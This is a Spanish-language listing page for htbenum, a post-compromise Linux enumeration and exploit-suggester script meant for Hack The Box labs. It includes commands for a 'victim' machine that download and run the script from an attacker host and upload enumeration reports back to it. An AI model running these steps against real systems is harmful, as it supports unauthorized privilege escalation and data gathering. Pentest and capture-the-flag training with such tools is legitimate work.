Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/solomonsklash/htbenum
Escalada de PrivilegiosFrameworks de ExploitsScripting y AutomatizaciónRecopilación de InformaciónPruebas de Penetración
GitHubsolomonsklash/htbenum

htbenum

Un script de enumeración para Linux para Hack The Box

Ver Repositorio
19236hace 6 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

htbenum

Un script de enumeración para Linux para Hack The Box

GitHub Github language GitHub issues Github contributors

Este script está diseñado para usarse en situaciones donde no tienes acceso a internet en un host Linux y deseas ejecutar scripts de enumeración y sugerencia de exploits, como en Hack The Box. A menudo me encuentro ejecutando un conjunto similar de scripts cuando consigo un punto de apoyo inicial en una máquina Linux, y este script ayuda a automatizar el proceso de descargar la última versión de cada script de enumeración, hacerlo ejecutable y ejecutarlo, además de enviar la salida a un archivo para revisión posterior. También incluye un servidor web integrado para alojar las herramientas y subir informes de vuelta a la máquina host.

¡Pull requests/sugerencias bienvenidos!

Características

  • 5 scripts de enumeración diferentes, incluyendo:
    • linux-smart-enumeration
    • LinEnum
    • linuxprivchecker.py
    • uptux
    • SUID3NUM
  • 2 herramientas diferentes de sugerencia de exploits, incluyendo:
    • linux-soft-exploit-suggester
    • LES: Herramienta de auditoría de escalada de privilegios en Linux
  • Servidor web integrado para alojar herramientas y subir informes completados
  • Función automática de descarga y actualización de herramientas
  • Opción de directorio personalizado, para cuando sabes que tienes acceso a un directorio específico (por defecto /tmp)
  • Menú interactivo que te permite elegir si ejecutar solo enumeración, solo sugerencia de exploits, o ambas
  • Verifica Python 2 y 3 y te indica qué scripts se omitirán si falta Python

Uso

root@kitploit:~
./htbenum.sh [-u] -i IP -p port [-o directory] [-w] [-r]

Example:
         Host machine: root@kali:~/htbenum# ./htbenum.sh -u
         Host machine: root@kali:~/htbenum# ./htbenum.sh -i 10.10.14.1 -p 80 -w
         Victim machine: www-data@victim:/tmp$ wget http://10.10.14.1:80/htbenum.sh
         Victim machine: www-data@victim:/tmp$ chmod +x ./htbenum.sh
         Victim machine: www-data@victim:/tmp$ ./htbenum.sh -i 10.10.14.1 -p 80 -r

 Parameters:
         -h - View help and usage.
         -i IP - IP address of the listening web server used for upload and download.
         -p port - TCP port of the listening web server used for upload and download.
         -o directory - Custom download and report creation directory (default is /tmp).
         -w - Start builtin web server for downloading files and uploading reports.
         -u - Update to the latest versions of each tool, overwriting any existing versions.
         -r - Upload reports back to the host machine web server (must support PUT requests).

Para usar htbenum, clona el repositorio y ejecuta el script con el parámetro update en tu máquina local. Esto descargará y actualizará todos los scripts necesarios desde internet (Github) y los colocará en el mismo directorio que htbenum.sh:

root@kitploit:~
root@kali:~# git clone https://github.com/SolomonSklash/htbenum
root@kali:~# cd htbenum
root@kali:~/htbenum#  ./htbenum.sh -u
_   _ ___________ _____ _   _ _   ____  ___
| | | |_   _| ___ \  ___| \ | | | | |  \/  |
| |_| | | | | |_/ / |__ |  \| | | | | .  . |
|  _  | | | | ___ \  __|| . ` | | | | |\/| |
| | | | | | | |_/ / |___| |\  | |_| | |  | |
\_| |_/ \_/ \____/\____/\_| \_/\___/\_|  |_/

By Solomon Sklash - [email protected] 

[i] Updating all tools...
2019-11-25 17:54:55 URL:https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh [31859/31859] -> "lse.sh" [1]
2019-11-25 17:54:55 URL:https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh [46476/46476] -> "linenum.sh" [1]
2019-11-25 17:54:56 URL:https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py [25304/25304] -> "linuxprivchecker.py" [1]
2019-11-25 17:54:56 URL:https://raw.githubusercontent.com/initstring/uptux/master/uptux.py [29853/29853] -> "uptux.py" [1]
2019-11-25 17:54:56 URL:https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py [12614/12614] -> "suid3num.py" [1]
2019-11-25 17:54:57 URL:https://raw.githubusercontent.com/belane/linux-soft-exploit-suggester/master/linux-soft-exploit-suggester.py [13886/13886] -> "les-soft.py" [1]
2019-11-25 17:54:58 URL:https://raw.githubusercontent.com/offensive-security/exploit-database/master/files_exploits.csv [5669905/5669905] -> "files_exploits.csv" [1]
2019-11-25 17:54:58 URL:https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh [82214/82214] -> "les.sh" [1]
[i] Update complete!
root@kali:~/htbenum#  

Luego, inicia el servidor web integrado para alojar las herramientas y recibir los informes completados. El servidor requiere Python 3. Puedes usar tu propio servidor web para alojar las herramientas, pero deberá soportar solicitudes PUT para la subida de informes.

root@kitploit:~
root@kali:~/htbenum# ./htbenum.sh -i 10.10.14.1 -p 80 -w

Finalmente, sube el script htbenum.sh a tu máquina objetivo, hazlo ejecutable y ejecútalo con la IP y el puerto de tu máquina host, con un directorio opcional para descargar archivos y escribir la salida del informe. También puedes opcionalmente subir los informes de vuelta a la máquina host. Por ejemplo:

root@kitploit:~
www-data@htb:/tmp$ wget http://10.10.99.100/htbenum.sh -O /tmp/htbenum.sh
www-data@htb:/tmp$ chmod +x ./htbenum.sh
www-data@htb:/tmp$ ./htbenum.sh -i 10.10.14.1 -p 80 -r

Cada herramienta enviará su salida a un archivo de informe en el mismo directorio que el script htbenum.sh, o en el directorio especificado por el parámetro -d.

Descargar herramienta